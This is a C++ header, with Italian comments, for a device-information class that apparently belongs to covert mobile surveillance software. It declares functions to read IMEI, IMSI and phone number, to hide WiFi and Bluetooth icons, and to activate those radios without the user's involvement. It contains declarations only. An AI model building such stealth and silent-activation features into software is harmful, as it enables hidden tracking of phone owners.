#include "Common.h"
#include <string>
#include <exception>
using namespace std;

#ifndef __Device_h__
#define __Device_h__

#include "Encryption.h"

class Status;
class Device;

// Tutti i puntatori tornati da questa classe vengono liberati dal distruttore.
class Device
{
	private:
	/**
	 * Definizioni per la classe singleton
	 */
	static Device *Instance;

	HANDLE hDeviceMutex;
	/**
	 * Struttura che definisce le funzionalita' presenti sul dispositivo e supportate da noi.
	 */
	private: DeviceStruct DevStruct;
	/**
	 * Database statico dei modelli e funzionalita' supportati.
	 */
	private: map<WCHAR *, DeviceStruct, PVOID> db;
	private: WCHAR *wImei, *wImsi, *wSimId, *wInstanceId, *wPhoneNumber, *wManufacturer, *wModel;

	public:
	/**
	* Device e' una classe singleton
	*/
	static Device* self();

	/**
	 * Ottiene informazioni sul sistema operativo e riempie la struttura passata per riferimento, torna TRUE se la
	 * chiamata e' andata a buon fine, FALSE altrimenti.
	 */
	public: BOOL GetOsVersion(OSVERSIONINFO* pVersionInfo);

	/**
	 * Torna TRUE se supportiamo l'hiding dell'icona del WiFi, FALSE altrimenti. Internamente questa funzione
	 * chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le funzionalita'
	 * supportate.
	 */
	public: BOOL IsWiFiHidingSupported();

	/**
	 * Torna TRUE se supportiamo l'hiding dell'icona del BlueTooth, FALSE altrimenti. Internamente questa funzione
	 * chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le funzionalita'
	 * supportate.
	 */
	public: void IsBTHidingSupported();

	/**
	 * Torna TRUE se il dispositivo e' dotato di un modulo per l'utilizzo del WiFi, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsWifi();

	/**
	 * Torna TRUE se il dispositivo e' dotato di un modulo per l'utilizzo del BT, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsBT();

	/**
	 * Torna TRUE se siamo in grado di attivare il WiFi senza intervento dell'utente, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsWiFiActivable();

	/**
	 * Torna TRUE se siamo in grado di attivare il BT senza intervento dell'utente, FALSE altrimenti. Internamente 
	 * questa funzione chiama GetOsVersion() e GetDeviceType() per effettuare il browsing del Db e vedere le 
	 * funzionalita' supportate.
	 */
	public: BOOL IsBTActivable();

	/**
	* Questa funzione legge il codice IMSI dal telefono e torna un puntatore alla stringa che lo contiene. 
	* Torna NULL in caso di errore.
	*/
	public: const WCHAR* GetImsi();

	/**
	 * Questa funzione legge il codice IMEI dal telefono e torna un puntatore alla stringa che lo contiene. 
	 * Torna NULL in caso di errore.
	 */
	public: const WCHAR* GetImei();

	/**
	 * Questa funzione ottiene un ID univoco per ogni telefono
	 */
	public: const BYTE* GetInstanceId();

	/**
	 * Ottiene il numero di telefono associato alla SIM correntemente inserita, il numero viene tornato come _stringa_.
	 * Se non e' possibile leggere il numero di telefono, la stringa e' nulla, in caso di errore la funzione torna
	 * NULL.
	 */
	public: const WCHAR* GetPhoneNumber();

	/**
	* Questa funzione il produttore del cellulare, NULL in caso di errore.
	*/
	public: const WCHAR* GetManufacturer();

	/**
	* Questa funzione il modello del cellulare, NULL in caso di errore.
	*/
	public: const WCHAR* GetModel();

	/**
	 * Questo metodo serve a refreshare esplicitamente tutte le informazioni contenute nella classe,
	 * va usato soltanto quando si e' certi che i dati sono cambiati (ad esempio la SIM e' stata modificata
	 * senza che il cellulare sia stato riavviato etc...). Torna TRUE se tutto e' andato a buon fine
	 * FALSE altrimenti.
	 */
	public: BOOL RefreshData();

	/**
	 * Costruttore di default, inizializza il database dei modelli e delle funzioni supportate.
	 */
	public:	Device();
			~Device();
};

#endif
